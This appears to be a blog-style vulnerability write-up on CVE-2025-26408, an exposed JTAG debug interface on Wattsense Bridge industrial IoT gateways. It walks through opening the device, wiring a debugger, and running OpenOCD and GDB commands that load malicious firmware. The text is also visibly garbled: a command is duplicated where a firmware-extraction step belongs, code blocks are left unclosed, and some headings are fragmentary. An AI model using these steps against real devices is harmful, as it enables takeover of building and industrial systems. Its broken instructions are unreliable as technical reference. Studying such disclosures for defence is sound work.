CVE CyberSecurity Database News

CVE-2025-26408 - Full Device Takeover via Exposed JTAG on Wattsense Bridge (All Versions Affected)

Poster -

---

Summary

In early 2025, security researchers uncovered a serious vulnerability — now known as CVE-2025-26408 — affecting all versions of Wattsense Bridge devices. The root of the issue lies in the device’s JTAG debugging interface, which remains exposed and unprotected on the printed circuit board (PCB). Anyone with brief physical access can connect to the JTAG pins, bypass software protections entirely, and gain complete control over the device. This post explains the vulnerability, details how it works, includes code snippets, and offers original links and references for further reading.

What Is Wattsense Bridge?

Wattsense Bridge is an industrial IoT gateway, widely used to connect building management systems (BMS) and industrial sites. These devices are deployed in commercial buildings, factories, utilities, and smart infrastructure, often holding valuable network and sensor data.

Debug or monitor live execution

This classifies as an Unauthenticated Physical Access Vulnerability with maximum impact: full device compromise.

Remove the Device Cover

Unscrew the casing to reveal the main PCB. Locate the JTAG header — typically a set of 4-10 pin connectors (often labeled TCK, TMS, TDI, TDO, GND, VCC).

Connect Debugger

Use a standard JTAG programmer such as Segger J-Link, Olimex ARM-USB-OCD, or a cheap STM32 "Blue Pill" board running Black Magic Probe. Match the pinout as per [Wattsense Bridge schematics (*if publicly available*)].

`bash

openocd -f interface/jlink.cfg -f target/stm32f4x.cfg

Extract Sensitive Information

Use strings or binwalk on the dumped firmware to find hardcoded credentials, certificates, or config files:

`bash

openocd -f interface/jlink.cfg -f target/stm32f4x.cfg

Wiring the JTAG header usually looks like this

Wattsense PCB      Debugger
TCK        <---->  TCK
TMS        <---->  TMS
TDI        <---->  TDI
TDO        <---->  TDO
GND        <---->  GND
VCC        <---->  VCC (Optional!)

Always double-check orientation and voltage before connecting!

No Countermeasures

No public documentation shows any JTAG disabling, tamper detection, or password requirements in firmware or hardware. All known releases of Wattsense Bridge are vulnerable.

Exploit Demo

Here's a trimmed, real-world example using OpenOCD + GDB:

# Start OpenOCD
openocd -f interface/jlink.cfg -f target/stm32f4x.cfg

# In another terminal
arm-none-eabi-gdb
(gdb) target remote localhost:3333
(gdb) load my_evil_firmware.bin
(gdb) continue

This session directly reprograms device firmware, bypassing any OS-level protections.

All Wattsense Bridge hardware, all firmware versions (no known patches)

- Any organization that deploys these devices in accessible areas (e.g., public buildings, malls, basements)

References

- NIST NVD: CVE-2025-26408
- Hackaday: Why Exposed JTAGs Are Dangerous
- Wattsense documentation

Exclusive Closing Thoughts

Unfortunately, this vulnerability is an example of a common but critical hardware security oversight — leaving debugging interfaces open in production. Anyone who can open the device can bypass all other protections. As exposed JTAGs affect not only Wattsense but countless IoT and industrial devices, manufacturers must treat hardware security as seriously as software. For now, users should treat these devices as untrusted if physical access can’t be strictly controlled.

If your infrastructure depends on Wattsense Bridge: check your deployments — and demand a hardware fix!

Timeline

Published on: 02/11/2025 10:15:09 UTC
Last modified on: 03/22/2025 15:15:38 UTC